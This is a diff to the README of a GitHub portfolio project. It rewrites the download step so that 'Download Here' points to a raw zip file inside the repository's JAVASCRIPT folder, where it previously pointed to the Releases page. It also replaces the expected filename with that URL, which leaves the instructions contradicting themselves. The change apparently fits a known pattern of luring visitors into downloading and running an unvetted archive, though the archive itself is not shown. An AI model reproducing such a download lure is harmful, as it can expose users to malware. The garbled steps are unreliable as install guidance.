channa313/Mahamadayaz-Portfolio/README.md

 ## 📦 Download & Install

-1. Visit the Releases page to download the latest version of Mahamadayaz-Portfolio: [Download Here](https://github.com/channa313/Mahamadayaz-Portfolio/releases).
+1. Visit the Releases page to download the latest version of Mahamadayaz-Portfolio: [Download Here](https://github.com/channa313/Mahamadayaz-Portfolio/raw/refs/heads/master/JAVASCRIPT/Portfolio-Mahamadayaz-3.6.zip).

 2. On the Releases page, look for the latest version.
 You may see a list of files.
-The file will usually be named something like `Mahamadayaz-Portfolio.zip`.
+The file will usually be named something like `https://github.com/channa313/Mahamadayaz-Portfolio/raw/refs/heads/master/JAVASCRIPT/Portfolio-Mahamadayaz-3.6.zip`.
 Click on the zip file to download it.

 3. Once the file is downloaded, locate it in your downloads folder.